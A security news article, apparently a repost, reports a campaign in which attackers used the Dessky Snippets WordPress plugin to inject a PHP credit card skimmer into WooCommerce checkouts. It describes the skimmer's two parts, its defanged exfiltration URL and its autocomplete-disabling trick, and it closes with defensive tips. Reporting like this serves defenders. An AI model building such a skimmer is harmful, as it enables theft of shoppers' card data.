close
close

WordPress plugin used to install e-skimmers in online stores

Posted on by darion

A WordPress plugin used to install e-skimmers on e-commerce websites

Pierluigi Paganini
May 28, 2024

Threat actors use the WordPress plugin to insert malicious PHP code into e-commerce sites and steal credit card information.

Sucuri researchers have observed that threat actors are using a snippet of WordPress plugin PHP code to install malicious code on WooCommerce online stores and collect credit card information.

In the campaign detected by experts, the attackers are using a very little-known WordPress plugin called Dessky Snippets, which at the time of writing had only a few hundred active installations.

Dessky Snippets is a lightweight and simple plugin that allows users to easily add custom PHP code from within their WordPress admin.

The campaign took place on May 11, and from the same day, researchers observed a sharp increase in the number of downloads of the Dessky Snippets plugin. Currently, the WordPress plugin has over 200 active installations.

Dessky Snippets WordPress plugin

The attackers used the Dessky Snippets plugin to insert a server-side PHP credit card e-skimmer.

“This malicious code has been written to a file dnsp_settings option in WordPress wp_options table and was designed to modify the WooCommerce checkout process by manipulating the checkout form and injecting custom code. – we read in the analysis published by Sucuri.

The pest consists of two main components. The first part uses a fake function called “twentytwenty_get_post_logos()” that connects to the WooCommerce billing form. The feature adds additional fields to the billing form allowing you to request credit card information earlier than usual. The second part involves an obfuscated credit card skimmer that monitors POST data for specific parameters. When the malware detects these parameters, it sends all collected billing and credit card information to the third party URL “hxxps://2of(.)cc/wp-content/”.

Researchers noticed that the billing form associated with the overlay used by the attackers had its autofill feature disabled. The fields are set to autocomplete = “off”.

Disabling the autofill feature of a fake transaction form is a trick to avoid the risk of the browser warning users about entering sensitive information. The fields remain blank until manually filled in, making them appear as regular, necessary transaction inputs and reducing user suspicion.

“Generally, e-commerce sites are prime targets for hackers because of the valuable data they handle.” summarizes the report. “Here’s a simple guide to protecting your online store:

  1. Update your software: Regularly update your CMS, plugins, themes and third-party components to patch vulnerabilities.
  2. Use strong passwords: Make sure all accounts, including admin, sFTP and database, have strong and unique passwords.
  3. Choose trusted scripts: Only integrate third-party JavaScript from reputable sources. Avoid unnecessary third-party scripts.
  4. Monitor threats: Check your site regularly for signs of malware, unauthorized changes, or any signs of a security breach.
  5. Implement a firewall: Use a web application firewall to block malicious bots, virtually patch known vulnerabilities, and filter malicious traffic.
  6. Configure the CSP: Establish a content security policy (CSP) to protect against clickjacking, cross-site scripting (XSS), and other threats.

Follow me on Twitter: @security AND Facebook and Mastodon

Pierluigi Paganini

(Security matters hacking, WordPress)